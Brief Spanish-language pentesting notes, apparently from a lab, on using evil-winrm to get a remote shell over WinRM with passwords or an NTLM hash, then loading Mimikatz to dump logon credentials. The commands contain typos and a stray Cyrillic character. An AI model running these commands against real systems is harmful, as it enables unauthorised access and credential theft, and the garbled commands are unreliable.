es una herramienta (script) que nos permite obtener una shell haciendo uso de WinRM (Exploiting WinRM)
evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.2.29.206
si le pasamao el parametro -H podemos pasarle el hash NTLM
nosotros podemos cargar una carpeta cuando estabmos estableciendo una conexion, es decir podemos hacer uso de herramientas de nuestro equipo
evil-winrm. rb -u administrator -р 'rocknroll_123321' -i 10.4.24.110 - s /root/Desktop/tools/scripts/
ya lo tenemos
podemos usar el modulo mimikatz
invoke-mimikatz -Command 'sedkurlsa::logonpass'